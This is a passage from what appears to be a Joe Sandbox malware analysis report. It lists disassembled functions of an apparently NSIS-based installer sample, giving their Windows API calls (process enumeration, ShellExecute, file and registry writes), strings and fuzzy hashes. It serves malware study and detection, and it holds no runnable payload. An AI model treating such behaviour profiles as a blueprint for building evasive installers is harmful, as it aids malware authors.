                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                  • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                                                                                                                  Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                    • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                  • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                  • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                  • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                  • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                                                  Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                  • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                    • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                    • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                    • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                  • String ID: F$N$open
                                                                                                                                                                                                                                                                  • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                  • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                  • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                  Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                  • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                    • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                    • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                  • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                    • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                    • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                  • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                  • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                  • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                  • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                  Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                  • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                  • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                  • String ID: F
                                                                                                                                                                                                                                                                  • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                  • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                  • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                  Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                  • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                  • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                  • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                  • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                  • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                  • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                  • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                  • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                  • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                  Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                  • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                  • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                  • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                  • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                  Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                  • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                  • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                  • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
